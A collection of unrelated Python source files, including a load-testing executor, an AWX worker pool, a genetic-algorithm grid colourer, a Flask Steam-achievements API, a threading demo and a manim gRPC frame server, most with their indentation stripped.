path = self.get_script_path(scenario=Scenario(self.engine, scenario))
if path:
label = os.path.basename(path)
if not path or label in scenarios:
hash_str = str(hashlib.md5(to_json(scenario).encode()).hexdigest())
label = 'autogenerated_' + hash_str[-10:]
scenarios[label] = scenario
self.execution['scenario'] = label
self.label = label
else: # get scenario by name
label = name
exc = TaurusConfigError("Scenario '%s' not found in scenarios: %s" % (label, scenarios.keys()))
scenario = scenarios.get(label, exc)
scenario_obj = Scenario(self.engine, scenario)
if name is None and cache_scenario:
self.__scenario = scenario_obj
return scenario_obj
def get_load(self):
"""
Helper method to read load specification
"""
def eval_int(value):
try:
return int(value)
except (ValueError, TypeError):
return value
def eval_float(value):
try:
return float(value)
except (ValueError, TypeError):
return value
prov_type = self.engine.config.get(Provisioning.PROV)
throughput = eval_float(self.execution.get(ScenarioExecutor.THRPT).get(prov_type, 0))
concurrency = eval_int(self.execution.get(ScenarioExecutor.CONCURR).get(prov_type, 0))
iterations = eval_int(self.execution.get("iterations", None))
ramp_up = self.execution.get(ScenarioExecutor.RAMP_UP, None)
steps = eval_int(self.execution.get(ScenarioExecutor.STEPS, None))
hold = dehumanize_time(self.execution.get(ScenarioExecutor.HOLD_FOR, 0))
if ramp_up is None:
duration = hold
else:
ramp_up = dehumanize_time(ramp_up)
duration = hold + ramp_up
if duration and not iterations:
iterations = 0 # which means infinite
msg = ''
if not isinstance(concurrency, numeric_types + (type(None),)):
msg += "Invalid concurrency value[%s]: %s " % (type(concurrency).__name__, concurrency)
if not isinstance(throughput, numeric_types + (type(None),)):
msg += "Invalid throughput value[%s]: %s " % (type(throughput).__name__, throughput)
if not isinstance(steps, numeric_types + (type(None),)):
msg += "Invalid throughput value[%s]: %s " % (type(steps).__name__, steps)
if not isinstance(iterations, numeric_types + (type(None),)):
msg += "Invalid throughput value[%s]: %s " % (type(iterations).__name__, iterations)
if msg:
raise TaurusConfigError(msg)
return self.LOAD_FMT(concurrency=concurrency, ramp_up=ramp_up, throughput=throughput, hold=hold,
iterations=iterations, duration=duration, steps=steps)
def get_resource_files(self):
files_list = []
if isinstance(self, FileLister):
files_list.extend(self.resource_files())
files_list.extend(self.execution.get("files", []))
return files_list
def __repr__(self):
return "%s/%s" % (self.execution.get("executor", None), self.label if self.label else id(self))
def execute(self, args, **kwargs):
self.preprocess_args(args)
# for compatibility with other executors
kwargs["stdout"] = kwargs.get("stdout", self.stdout) or PIPE
kwargs["stderr"] = kwargs.get("stderr", self.stderr) or PIPE
kwargs["cwd"] = kwargs.get("cwd", None)
kwargs["env"] = self.env
try:
process = self.engine.start_subprocess(args=args, **kwargs)
except OSError as exc:
raise ToolError("Failed to start %s: %s (%s)" % (self.__class__.__name__, exc, args))
return process
def post_process(self):
if self.stdout:
self.stdout.close()
if self.stderr:
self.stderr.close()
super(ScenarioExecutor, self).post_process()
class Reporter(EngineModule):
"""
Modules of this type are responsible for
in-test and post-test results analysis
"""
REP = "reporting"
def should_run(self):
return self._should_run()
class Service(EngineModule):
"""
Modules of this type provide auxiliary services that run alongside the test
"""
SERV = "services"
def should_run(self):
return self._should_run()
class Aggregator(EngineModule):
def __init__(self, is_functional):
super(Aggregator, self).__init__()
self.is_functional = is_functional
class Scenario(UserDict, object):
"""
Test scenario entity
"""
SCRIPT = "script"
COOKIES = "cookies"
FIELD_RESP_CODE = "http-code"
FIELD_HEADERS = "headers"
FIELD_BODY = "body"
FIELD_DATA_SOURCES = 'data-sources'
def __init__(self, engine, scenario=None):
super(Scenario, self).__init__()
self.engine = engine
self.data = scenario
def get(self, key, default=defaultdict):
"""
:param key:
:type default: object
:return:
"""
return self.data.get(key, default)
def __getitem__(self, item):
return self.data[item]
def __setitem__(self, key, value):
self.data[key] = value
def __iter__(self):
for item in self.data:
yield item
def __len__(self):
return len(self.data)
def __delitem__(self, key):
return self.data.pop(key)
def get_headers(self):
"""
Returns global headers
:rtype: dict[str,str]
"""
scenario = self
headers = scenario.get("headers", {})
if headers is None:
headers = {}
return headers
def get_requests(self, parser=RequestParser, require_url=True):
"""
Generator object to read requests
:type require_url: bool
:type parser: class
:rtype: list[bzt.requests_model.Request]
"""
requests_parser = parser(self, self.engine)
return requests_parser.extract_requests(require_url=require_url,)
def get_data_sources(self):
data_sources = self.get(self.FIELD_DATA_SOURCES, [])
if not isinstance(data_sources, list):
raise TaurusConfigError("data-sources '%s' is not a list" % data_sources)
for index, _ in enumerate(data_sources):
ensure_is_dict(data_sources, index, "path")
return self.get(self.FIELD_DATA_SOURCES, [])
class HavingInstallableTools(object):
@abstractmethod
def install_required_tools(self):
pass
class Singletone(object):
pass
class SelfDiagnosable(object):
@abstractmethod
def get_error_diagnostics(self):
"""
:rtype: list[str]
"""
pass
|
pool.py
|
import logging
import os
import random
import sys
import traceback
from uuid import uuid4
import collections
from multiprocessing import Process
from multiprocessing import Queue as MPQueue
from queue import Full as QueueFull, Empty as QueueEmpty
from django.conf import settings
from django.db import connection as django_connection, connections
from django.core.cache import cache as django_cache
from jinja2 import Template
import psutil
from awx.main.models import UnifiedJob
from awx.main.dispatch import reaper
if 'run_callback_receiver' in sys.argv:
logger = logging.getLogger('awx.main.commands.run_callback_receiver')
else:
logger = logging.getLogger('awx.main.dispatch')
class PoolWorker(object):
'''
Used to track a worker child process and its pending and finished messages.
This class makes use of two distinct multiprocessing.Queues to track state:
- self.queue: this is a queue which represents pending messages that should
be handled by this worker process; as new AMQP messages come
in, a pool will put() them into this queue; the child
process that is forked will get() from this queue and handle
received messages in an endless loop
- self.finished: this is a queue which the worker process uses to signal
that it has finished processing a message
When a message is put() onto this worker, it is tracked in
self.managed_tasks.
Periodically, the worker will call .calculate_managed_tasks(), which will
cause messages in self.finished to be removed from self.managed_tasks.
In this way, self.managed_tasks represents a view of the messages assigned
to a specific process. The message at [0] is the least-recently inserted
message, and it represents what the worker is running _right now_
(self.current_task).
A worker is "busy" when it has at least one message in self.managed_tasks.
It is "idle" when self.managed_tasks is empty.
'''
def __init__(self, queue_size, target, args):
self.messages_sent = 0
self.messages_finished = 0
self.managed_tasks = collections.OrderedDict()
self.finished = MPQueue(queue_size)
self.queue = MPQueue(queue_size)
self.process = Process(target=target, args=(self.queue, self.finished) + args)
self.process.daemon = True
def start(self):
self.process.start()
def put(self, body):
uuid = '?'
if isinstance(body, dict):
if not body.get('uuid'):
body['uuid'] = str(uuid4())
uuid = body['uuid']
logger.debug('delivered {} to worker[{}] qsize {}'.format(
uuid, self.pid, self.qsize
))
self.managed_tasks[uuid] = body
self.queue.put(body, block=True, timeout=5)
self.messages_sent += 1
self.calculate_managed_tasks()
def quit(self):
'''
Send a special control message to the worker that tells it to exit
gracefully.
'''
self.queue.put('QUIT')
@property
def pid(self):
return self.process.pid
@property
def qsize(self):
return self.queue.qsize()
@property
def alive(self):
return self.process.is_alive()
@property
def mb(self):
if self.alive:
return '{:0.3f}'.format(
psutil.Process(self.pid).memory_info().rss / 1024.0 / 1024.0
)
return '0'
@property
def exitcode(self):
return str(self.process.exitcode)
def calculate_managed_tasks(self):
# look to see if any tasks were finished
finished = []
for _ in range(self.finished.qsize()):
try:
finished.append(self.finished.get(block=False))
except QueueEmpty:
break # qsize is not always _totally_ up to date
# if any tasks were finished, removed them from the managed tasks for
# this worker
for uuid in finished:
try:
del self.managed_tasks[uuid]
self.messages_finished += 1
except KeyError:
# ansible _sometimes_ appears to send events w/ duplicate UUIDs;
# UUIDs for ansible events are *not* actually globally unique
# when this occurs, it's _fine_ to ignore this KeyError because
# the purpose of self.managed_tasks is to just track internal
# state of which events are *currently* being processed.
logger.warn('Event UUID {} appears to have been duplicated.'.format(uuid))
@property
def current_task(self):
self.calculate_managed_tasks()
# the task at [0] is the one that's running right now (or is about to
# be running)
if len(self.managed_tasks):
return self.managed_tasks[list(self.managed_tasks.keys())[0]]
return None
@property
def orphaned_tasks(self):
orphaned = []
if not self.alive:
# if this process had a running task that never finished,
# requeue its error callbacks
current_task = self.current_task
if isinstance(current_task, dict):
orphaned.extend(current_task.get('errbacks', []))
# if this process has any pending messages requeue them
for _ in range(self.qsize):
try:
message = self.queue.get(block=False)
if message != 'QUIT':
orphaned.append(message)
except QueueEmpty:
break # qsize is not always _totally_ up to date
if len(orphaned):
logger.error(
'requeuing {} messages from gone worker pid:{}'.format(
len(orphaned), self.pid
)
)
return orphaned
@property
def busy(self):
self.calculate_managed_tasks()
return len(self.managed_tasks) > 0
@property
def idle(self):
return not self.busy
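# A rough sketch of the worker-side half of the protocol described in the
# PoolWorker docstring above, matching the (queue, finished, idx) signature
# that WorkerPool passes to the child process: read bodies from `queue`,
# acknowledge them on `finished` by uuid, and exit on the special 'QUIT'
# message. Illustrative only; the real loop lives in awx.main.dispatch.worker.
def _example_work_loop(queue, finished, idx):
    while True:
        body = queue.get()  # blocks until the pool put()s a message
        if body == 'QUIT':
            break
        try:
            pass  # ... perform_work(body) would go here ...
        finally:
            if isinstance(body, dict) and 'uuid' in body:
                finished.put(body['uuid'])  # lets the pool drop it from managed_tasks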
class WorkerPool(object):
'''
Creates a pool of forked PoolWorkers.
As WorkerPool.write(...) is called (generally, by a kombu consumer
implementation when it receives an AMQP message), messages are passed to
one of the multiprocessing Queues where some work can be done on them.
class MessagePrinter(awx.main.dispatch.worker.BaseWorker):
def perform_work(self, body):
print(body)
pool = WorkerPool(min_workers=4) # spawn four worker processes
pool.init_workers(MessagePrinter().work_loop)
pool.write(
0, # preferred worker 0
'Hello, World!'
)
'''
debug_meta = ''
def __init__(self, min_workers=None, queue_size=None):
self.name = settings.CLUSTER_HOST_ID
self.pid = os.getpid()
self.min_workers = min_workers or settings.JOB_EVENT_WORKERS
self.queue_size = queue_size or settings.JOB_EVENT_MAX_QUEUE_SIZE
self.workers = []
def __len__(self):
return len(self.workers)
def init_workers(self, target, *target_args):
self.target = target
self.target_args = target_args
for idx in range(self.min_workers):
self.up()
def up(self):
idx = len(self.workers)
# It's important to close these because we're _about_ to fork, and we
# don't want the forked processes to inherit the open sockets
# for the DB and memcached connections (that way lies race conditions)
django_connection.close()
django_cache.close()
worker = PoolWorker(self.queue_size, self.target, (idx,) + self.target_args)
self.workers.append(worker)
try:
worker.start()
except Exception:
logger.exception('could not fork')
else:
logger.warn('scaling up worker pid:{}'.format(worker.pid))
return idx, worker
def debug(self, *args, **kwargs):
self.cleanup()
tmpl = Template(
'{{ pool.name }}[pid:{{ pool.pid }}] workers total={{ workers|length }} {{ meta }} \n'
'{% for w in workers %}'
'. worker[pid:{{ w.pid }}]{% if not w.alive %} GONE exit={{ w.exitcode }}{% endif %}'
' sent={{ w.messages_sent }}'
' finished={{ w.messages_finished }}'
' qsize={{ w.managed_tasks|length }}'
' rss={{ w.mb }}MB'
'{% for task in w.managed_tasks.values() %}'
'\n - {% if loop.index0 == 0 %}running {% else %}queued {% endif %}'
'{{ task["uuid"] }} '
'{% if "task" in task %}'
'{{ task["task"].rsplit(".", 1)[-1] }}'
# don't print kwargs, they often contain launch-time secrets
'(*{{ task.get("args", []) }})'
'{% endif %}'
'{% endfor %}'
'{% if not w.managed_tasks|length %}'
' [IDLE]'
'{% endif %}'
'\n'
'{% endfor %}'
)
return tmpl.render(pool=self, workers=self.workers, meta=self.debug_meta)
def write(self, preferred_queue, body):
queue_order = sorted(range(len(self.workers)), key=lambda x: -1 if x==preferred_queue else x)
write_attempt_order = []
for queue_actual in queue_order:
try:
self.workers[queue_actual].put(body)
return queue_actual
except QueueFull:
pass
except Exception:
tb = traceback.format_exc()
logger.warn("could not write to queue %s" % preferred_queue)
logger.warn("detail: {}".format(tb))
write_attempt_order.append(preferred_queue)
logger.error("could not write payload to any queue, attempted order: {}".format(write_attempt_order))
return None
def stop(self, signum):
try:
for worker in self.workers:
os.kill(worker.pid, signum)
except Exception:
logger.exception('could not kill {}'.format(worker.pid))
class AutoscalePool(WorkerPool):
'''
An extended pool implementation that automatically scales workers up and
down based on demand
'''
def __init__(self, *args, **kwargs):
self.max_workers = kwargs.pop('max_workers', None)
super(AutoscalePool, self).__init__(*args, **kwargs)
if self.max_workers is None:
settings_absmem = getattr(settings, 'SYSTEM_TASK_ABS_MEM', None)
if settings_absmem is not None:
total_memory_gb = int(settings_absmem)
else:
total_memory_gb = (psutil.virtual_memory().total >> 30) + 1 # noqa: round up
# 5 workers per GB of total memory
self.max_workers = (total_memory_gb * 5)
# max workers can't be less than min_workers
self.max_workers = max(self.min_workers, self.max_workers)
@property
def should_grow(self):
if len(self.workers) < self.min_workers:
# If we don't have at least min_workers, add more
return True
# If every worker is busy doing something, add more
return all([w.busy for w in self.workers])
@property
def full(self):
return len(self.workers) == self.max_workers
@property
def debug_meta(self):
return 'min={} max={}'.format(self.min_workers, self.max_workers)
def cleanup(self):
"""
Perform some internal accounting and cleanup. This is run on
every cluster node heartbeat:
1. Discover worker processes that exited, and recover messages they
were handling.
2. Clean up unnecessary, idle workers.
3. Check to see if the database says this node is running any tasks
that aren't actually running. If so, reap them.
IMPORTANT: this function is one of the few places in the dispatcher
(aside from setting lookups) where we talk to the database. As such,
if there's an outage, this method _can_ throw various
django.db.utils.Error exceptions. Act accordingly.
"""
orphaned = []
for w in self.workers[::]:
if not w.alive:
# the worker process has exited
# 1. take the task it was running and enqueue the error
# callbacks
# 2. take any pending tasks delivered to its queue and
# send them to another worker
logger.error('worker pid:{} is gone (exit={})'.format(w.pid, w.exitcode))
if w.current_task:
if w.current_task != 'QUIT':
try:
for j in UnifiedJob.objects.filter(celery_task_id=w.current_task['uuid']):
reaper.reap_job(j, 'failed')
except Exception:
logger.exception('failed to reap job UUID {}'.format(w.current_task['uuid']))
orphaned.extend(w.orphaned_tasks)
self.workers.remove(w)
elif w.idle and len(self.workers) > self.min_workers:
# the process has an empty queue (it's idle) and we have
# more processes in the pool than we need (> min)
# send this process a message so it will exit gracefully
# at the next opportunity
logger.warn('scaling down worker pid:{}'.format(w.pid))
w.quit()
self.workers.remove(w)
for m in orphaned:
# if all the workers are dead, spawn at least one
if not len(self.workers):
self.up()
idx = random.choice(range(len(self.workers)))
self.write(idx, m)
# if the database says a job is running on this node, but it's *not*,
# then reap it
running_uuids = []
for worker in self.workers:
worker.calculate_managed_tasks()
running_uuids.extend(list(worker.managed_tasks.keys()))
reaper.reap(excluded_uuids=running_uuids)
def up(self):
if self.full:
# if we can't spawn more workers, just toss this message into a
# random worker's backlog
idx = random.choice(range(len(self.workers)))
return idx, self.workers[idx]
else:
return super(AutoscalePool, self).up()
def write(self, preferred_queue, body):
try:
# when the cluster heartbeat occurs, clean up internally
if isinstance(body, dict) and 'cluster_node_heartbeat' in body['task']:
self.cleanup()
if self.should_grow:
self.up()
# we don't care about "preferred queue" round robin distribution, just
# find the first non-busy worker and claim it
workers = self.workers[:]
random.shuffle(workers)
for w in workers:
if not w.busy:
w.put(body)
break
else:
return super(AutoscalePool, self).write(preferred_queue, body)
except Exception:
for conn in connections.all():
# If the database connection has a hiccup, re-establish a new
# connection
conn.close_if_unusable_or_obsolete()
logger.exception('failed to write inbound message')
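# A small, self-contained sketch of the worker-ceiling heuristic used by
# AutoscalePool above: 5 workers per GB of total memory (or per the
# SYSTEM_TASK_ABS_MEM override), never below min_workers. Illustrative only.
def _estimate_max_workers(min_workers=4, settings_absmem=None):
    if settings_absmem is not None:
        total_memory_gb = int(settings_absmem)
    else:
        total_memory_gb = (psutil.virtual_memory().total >> 30) + 1  # round up
    return max(min_workers, total_memory_gb * 5)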
|
Color_map.py
|
from Genetica import Genetica
import numpy as np
import random
import matplotlib.pyplot as plt
import threading
import math
class Color_map(Genetica):
def __init__(self,prob_cruza=0.8,prob_mut=0.5,porcentaje_elite=0.1,poblacion=50,generaciones=100, fitness_min = 0.9,tam_x=8,tam_y=8):
Genetica.__init__(self,prob_cruza,prob_mut,porcentaje_elite,poblacion,generaciones,fitness_min)
self.tam_x = tam_x
self.tam_y = tam_y
self.rand_colors_dict = [(0,0,255),(255,255,0),(0,255,0),(255,0,0)]
self.disp_color = [17,18,13,16]
@staticmethod
def gen_random_color():
return (random.randint(0,255),random.randint(0,255),random.randint(0,255))
def gen_random_individuo(self):
disp_color = []
for disp in self.disp_color:
disp_color.append(disp)
ind = np.zeros((self.tam_x*self.tam_y))
for i in range(self.tam_x*self.tam_y):
color_rand = random.randint(0,len(self.rand_colors_dict)-1)
while disp_color[color_rand] == 0:
color_rand = random.randint(0,len(self.rand_colors_dict)-1)
disp_color[color_rand] = disp_color[color_rand] - 1
ind[i] = color_rand
return ind.reshape(self.tam_x,self.tam_y)
# unreachable alternative generator, kept for reference:
# return np.random.randint(low=0,high=len(self.rand_colors_dict),size=(self.tam_x,self.tam_y)).astype(int)
def add_random_individuo(self):
ind = self.gen_random_individuo()
self.poblacion_actual.append({"individuo":ind,"fitness":self.fitness(ind)})
def gen_poblacion_inicial(self):
for i in range(self.poblacion):
threading.Thread(target=self.add_random_individuo).start()
while len(self.poblacion_actual) < self.poblacion:
pass
def contar_colores(self,individuo):
color = np.zeros((len(self.rand_colors_dict)))
for col in individuo.reshape(self.tam_x*self.tam_y):
color[int(col)] = color[int(col)] + 1
return color
def mostrar_individuo(self,individuo):
ind = []
for x in range(self.tam_x):
ind.append([])
for y in range(self.tam_y):
ind[x].append(self.rand_colors_dict[int(individuo[x][y])])
plt.imshow(ind)
print(self.contar_colores(individuo))
file = "resultados.csv"
with open(file,"a") as f:
f.write("\n"+str(self.prob_cruza)+","+str(self.prob_mut)+","+str(self.porcentaje_elite)+","+str(self.poblacion)+","+str(self.generaciones)+","+str(self.fitness_min)+","+str(float(self.poblacion_elite[0]["fitness"])*100)+"%")
plt.show()
def evaluar(self):
if self.poblacion_elite[0]["fitness"] >= self.fitness_min:
return True
return False
@staticmethod
def fit_opt(individuo,tam_x,tam_y):
aptitud = 0
cont_aptitud = 0
for y in range(tam_y):
for x in range(tam_x):
norte = (x,y - 1)
oeste = (x - 1,y)
sur = (x,y + 1)
este = (x + 1,y)
noroeste = (x - 1, y - 1)
suroeste = (x - 1, y + 1)
noreste = (x + 1, y - 1)
sureste = (x + 1, y + 1)
vecinos = [norte,sur,este,oeste,noreste,noroeste,sureste,suroeste]
for vecino in vecinos:
xv,yv = vecino
if xv >=0 and yv >=0 and xv <= tam_x - 1 and yv <= tam_y - 1:
if(individuo[x][y] == individuo[xv][yv]):
aptitud = aptitud + 1
cont_aptitud = cont_aptitud + 1
return aptitud/cont_aptitud
@staticmethod
def fit_opt_2(individuo,tam_x,tam_y):
aptitud = 0
cont_aptitud = 0
for y in range(tam_y):
for x in range(tam_x):
val_act = individuo[x][y]
for y2 in range(tam_y):
for x2 in range(tam_x):
if x != x2 or y != y2:
if val_act == individuo[x2][y2]:
aptitud = aptitud + math.sqrt((x2-x)**2+(y2-y)**2)
cont_aptitud = cont_aptitud + 1
return (aptitud/cont_aptitud)/10
def fitness(self,individuo):
##return self.fit_opt_2(individuo,self.tam_x,self.tam_y)
return self.fit_opt(individuo,self.tam_x,self.tam_y)
def cruzar(self,individuo1,individuo2):
temp = individuo1["individuo"]
for x in range(self.tam_y):
for y in range(self.tam_x):
if not self.is_elite(individuo1):
if random.random() <= self.prob_cruza:
individuo1["individuo"][x][y] = individuo2["individuo"][x][y]
if not self.is_elite(individuo2):
if random.random() <= self.prob_cruza:
individuo2["individuo"][x][y] = temp[x][y]
individuo1 = self.mutar(individuo1)
individuo2 = self.mutar(individuo2)
threading.Thread(target=self.calc_fitness,args=(individuo1["individuo"],)).start()
threading.Thread(target=self.calc_fitness,args=(individuo2["individuo"],)).start()
def gen_rand_pos(self):
x = random.randint(0,self.tam_x-1)
y = random.randint(0,self.tam_y-1)
return x,y
def calc_fitness(self,individuo):
self.poblacion_siguiente.append({"individuo":individuo,"fitness":self.fitness(individuo)})
def mutar(self,individuo):
ind = individuo
individuo = individuo["individuo"]
if not self.is_elite(ind):
for x in range(self.tam_x):
for y in range(self.tam_y):
if random.random() <= self.prob_mut:
rand_x = random.randint(0,self.tam_x-1)
rand_y = random.randint(0,self.tam_y-1)
temp = individuo[x][y]
individuo[x][y] = individuo[rand_x][rand_y]
individuo[rand_x][rand_y] = temp
ind["inidividuo"] = individuo
return ind
def elite(self):
pob = sorted(self.poblacion_actual, key = lambda i: i['fitness'],reverse=True)
num_pob_elite = int(self.poblacion * self.porcentaje_elite)
self.poblacion_elite = pob[:num_pob_elite]
def is_elite(self, individuo):
tam_elite = len(self.poblacion_elite) - 1
if individuo['fitness'] >= self.poblacion_elite[tam_elite]['fitness']:
return True
return False
def sust_not_elite(self,poblacion):
poblacion_nueva = []
for pob in poblacion:
if self.is_elite(pob):
poblacion_nueva.append(pob)
else:
ind = self.gen_random_individuo()
poblacion_nueva.append({"individuo":ind,"fitness":self.fitness(ind)})
return poblacion_nueva
def evolucionar(self):
self.gen_poblacion_inicial()
self.elite()
self.poblacion_siguiente = []
for generacion in range(self.generaciones):
if self.evaluar():
print("Candidato adecuado encontrado")
self.mostrar_individuo(self.poblacion_elite[0]["individuo"])
break
else:
print("generacion {} El mejor candidato hasta ahora es {}".format(generacion+1,self.poblacion_elite[0]["fitness"]))
candidatos = []
ind_num = 0
while len(self.poblacion_actual) > 0:
ind_num = ind_num + 1
candidatos.append(self.poblacion_actual.pop())
if len(candidatos) == 2:
threading.Thread(target=self.cruzar,args=(candidatos[0],candidatos[1],)).start()
candidatos = []
if len(candidatos) == 1:
self.poblacion_siguiente.append(candidatos.pop())
while(len(self.poblacion_siguiente)<self.poblacion):
pass
self.poblacion_actual = []
self.poblacion_actual = self.sust_not_elite(self.poblacion_siguiente)
self.poblacion_siguiente = []
self.elite()
self.mostrar_individuo(self.poblacion_elite[0]["individuo"])
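# A tiny smoke-test sketch for the neighbourhood fitness above (illustrative
# only, and assuming the Genetica import at the top of this file resolves).
# fit_opt returns the fraction of in-bounds neighbour pairs sharing a colour,
# diagonals included, so a 2x2 checkerboard scores 1/3 and a solid grid 1.0.
if __name__ == "__main__":
    checkerboard = np.array([[0, 1], [1, 0]])
    solid = np.zeros((2, 2))
    print(Color_map.fit_opt(checkerboard, 2, 2))  # ~0.333: only the diagonal neighbour matches
    print(Color_map.fit_opt(solid, 2, 2))         # 1.0: every neighbour pair matches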
|
main.py
|
#!/usr/bin/env python
from multiprocessing import Process
import os
from flask import Flask, jsonify, make_response
from neomodel import config as neoconfig
import yaml
import unlocked
import data
import imports
from common.model import Achievement, Game, Player, to_dict
# create a new Flask object
app = Flask(__name__)
@app.route("/achievements")
def get_achievements() -> str:
return jsonify([achievement.__dict__ for achievement in Achievement.nodes.all()])
@app.route("/achievements/unlocked")
def get_unlocked_achievements() -> str:
# hardcode for testing
steam_id = 76561197962272442
game_id = 440
list_of_achievements_per_game = data.get_achievements_steam_single(
steam_id, cfg["steam"]["key"], game_id)
# number of unlocked achievements
count_of_unlocked_achievements = unlocked.count_unlocked_achievements(
list_of_achievements_per_game)
# list all unlocked achievements
unlocked_achievements = unlocked.list_unlocked_achievements(
list_of_achievements_per_game)
return jsonify(unlocked_achievements)
@app.route("/")
def test() -> str:
return jsonify({1: "ein", 2: "schluessel", 3: "fuer", 4: "schloesser"})
@app.route("/games")
def get_games() -> str:
return jsonify([to_dict(game) for game in Game.nodes.all()])
@app.route("/games/<int:app_id>/achievements")
def get_achievement_for_game(app_id) -> str:
game: Game = Game.nodes.get_or_none(steam_app_id=app_id)
if game is not None:
return jsonify([to_dict(achievement) for achievement in game.achievements.all()])
else:
return make_response('Game not found', 404)
@app.route("/players")
def get_players() -> str:
return jsonify([player.to_dict() for player in Player.nodes.all()])
def do_imports(cfg):
neoconfig.DATABASE_URL = cfg["neo4j"]["uri"]
# some initialization of game data, achievements, ...
imports.steam(76561197966228499, cfg["steam"]["key"]) # biftheki
imports.steam(76561197962272442, cfg["steam"]["key"]) # oxisto
imports.steam(76561197960824521, cfg["steam"]["key"]) # ipec
imports.steam(76561197960616970, cfg["steam"]["key"]) # neo
print("Done with imports")
if __name__ == "__main__":
if os.environ.get("WERKZEUG_RUN_MAIN") == "true":
# our default configuration
default_cfg = {
"neo4j": {
"uri": "bolt://localhost:7687",
"username": "neo4j",
"password": "password"
},
"steam": {}
}
# load config file
ymlfile = open("config.yml", "r")
# merge default configuration with the one in the yaml file
cfg = {**default_cfg, **yaml.safe_load(ymlfile)}  # shallow merge; see the deep_merge sketch at the end of this file
if "key" not in cfg["steam"]:
print("Please provide a steam key.")
exit(-1)
neoconfig.DATABASE_URL = cfg["neo4j"]["uri"]
# launch a separate thread/process for imports
print("Spawning imports process")
p = Process(target=do_imports, args=(cfg,))
p.start()
# start the REST API
app.run(debug=True)
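# A hedged sketch of a recursive merge for the config handling above: the
# {**default_cfg, **file_cfg} merge is shallow, so a config.yml that sets only
# neo4j.uri would drop the default username/password. A helper like this
# (hypothetical, not wired into the app) would preserve nested defaults.
def deep_merge(defaults: dict, overrides: dict) -> dict:
    merged = dict(defaults)
    for key, value in overrides.items():
        if isinstance(value, dict) and isinstance(merged.get(key), dict):
            merged[key] = deep_merge(merged[key], value)
        else:
            merged[key] = value
    return merged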
|
threadJoin.py
|
import threading
import time
def ourThread(i):
print("Thread {} Started".format(i))
time.sleep(i*2)
print("Thread {} Finished".format(i))
def main():
thread = threading.Thread(target=ourThread, args=(1,))
thread.start()
print("Is thread 1 Finished?")
thread2 = threading.Thread(target=ourThread, args=(2,))
thread2.start()
thread2.join()
print("Thread 2 definitely finished")
if __name__ == '__main__':
main()
|
frame_server_impl.py
|
from ...config import config
from ...scene import scene
from ..gen import frameserver_pb2
from ..gen import frameserver_pb2_grpc
from ..gen import renderserver_pb2
from ..gen import renderserver_pb2_grpc
from concurrent import futures
from google.protobuf import json_format
from watchdog.events import LoggingEventHandler, FileSystemEventHandler
from watchdog.observers import Observer
import grpc
import subprocess as sp
import threading
import time
import ctypes
from ...utils.module_ops import (
get_module,
get_scene_classes_from_module,
get_scenes_to_render,
)
from ... import logger
from ...constants import JS_RENDERER_INFO
class FrameServer(frameserver_pb2_grpc.FrameServerServicer):
def animation_index_is_cached(self, animation_index):
return animation_index < len(self.keyframes)
def __init__(self, server, scene_class):
self.server = server
self.keyframes = []
self.scene = scene_class(self)
self.scene_thread = threading.Thread(
target=lambda s: s.render(), args=(self.scene,)
)
self.previous_frame_animation_index = None
self.scene_finished = False
path = "./example_scenes/basic.py"
event_handler = UpdateFrontendHandler(self)
observer = Observer()
observer.schedule(event_handler, path)
observer.start()
# If a javascript renderer is running, notify it of the scene being served. If
# not, spawn one and it will request the scene when it starts.
with grpc.insecure_channel("localhost:50052") as channel:
stub = renderserver_pb2_grpc.RenderServerStub(channel)
request = renderserver_pb2.NewSceneRequest(name=str(self.scene))
try:
stub.NewScene(request)
except grpc._channel._InactiveRpcError:
logger.warning(f"No frontend was detected at localhost:50052.")
try:
sp.Popen(config["js_renderer_path"])
except PermissionError:
logger.info(JS_RENDERER_INFO)
self.server.stop(None)
return
self.scene_thread.start()
def signal_pending_animation(self, animation_index):
self.scene.start_animation = animation_index
self.scene.animation_finished.set()
return frameserver_pb2.FrameResponse(frame_pending=True)
def GetFrameAtTime(self, request, context):
selected_scene = None
if self.animation_index_is_cached(request.animation_index):
selected_scene = self.keyframes[request.animation_index]
else:
return self.signal_pending_animation(request.animation_index)
# play() uses run_time and wait() uses duration TODO: Fix this inconsistency.
# TODO: What about animations without a fixed duration?
duration = (
selected_scene.run_time
if selected_scene.animations
else selected_scene.duration
)
if request.animation_offset > duration:
if self.animation_index_is_cached(request.animation_index + 1):
# TODO: Clone scenes to allow reuse.
selected_scene = self.keyframes[request.animation_index + 1]
else:
return self.signal_pending_animation(request.animation_index + 1)
setattr(selected_scene, "camera", self.scene.camera)
if selected_scene.animations:
# This is a call to play().
selected_scene.update_animation_to_time(request.animation_offset)
selected_scene.update_frame(
selected_scene.moving_mobjects,
selected_scene.static_image,
)
serialized_mobject_list, duration = selected_scene.add_frame(
selected_scene.renderer.get_frame()
)
resp = list_to_frame_response(
selected_scene, duration, serialized_mobject_list
)
return resp
else:
# This is a call to wait().
if selected_scene.should_update_mobjects():
# TODO, be smart about setting a static image
# the same way Scene.play does
selected_scene.update_animation_to_time(request.animation_offset)
selected_scene.update_frame()
serialized_mobject_list, duration = selected_scene.add_frame(
selected_scene.get_frame()
)
frame_response = list_to_frame_response(
selected_scene, duration, serialized_mobject_list
)
if (
selected_scene.stop_condition is not None
and selected_scene.stop_condition()
):
selected_scene.animation_finished.set()
frame_response.frame_pending = True
selected_scene.renderer_waiting = True
return frame_response
elif selected_scene.skip_animations:
# Do nothing
return
else:
selected_scene.update_frame()
dt = 1 / selected_scene.camera.frame_rate
serialized_mobject_list, duration = selected_scene.add_frame(
selected_scene.get_frame(),
num_frames=int(selected_scene.duration / dt),
)
resp = list_to_frame_response(
selected_scene, duration, serialized_mobject_list
)
return resp
def RendererStatus(self, request, context):
response = frameserver_pb2.RendererStatusResponse()
response.scene_name = str(self.scene)
return response
# def UpdateSceneLocation(self, request, context):
# # Reload self.scene.
# print(scene_classes_to_render)
# response = frameserver_pb2.SceneLocationResponse()
# return response
def list_to_frame_response(scene, duration, serialized_mobject_list):
response = frameserver_pb2.FrameResponse()
response.frame_pending = False
response.duration = duration
for mob_serialization in serialized_mobject_list:
mob_proto = response.mobjects.add()
mob_proto.id = mob_serialization["id"]
mob_proto.needs_redraw = mob_serialization["needs_redraw"]
for point in mob_serialization["points"]:
point_proto = mob_proto.points.add()
point_proto.x = point[0]
point_proto.y = point[1]
point_proto.z = point[2]
mob_proto.style.fill_color = mob_serialization["style"]["fill_color"]
mob_proto.style.fill_opacity = float(mob_serialization["style"]["fill_opacity"])
mob_proto.style.stroke_color = mob_serialization["style"]["stroke_color"]
mob_proto.style.stroke_opacity = float(
mob_serialization["style"]["stroke_opacity"]
)
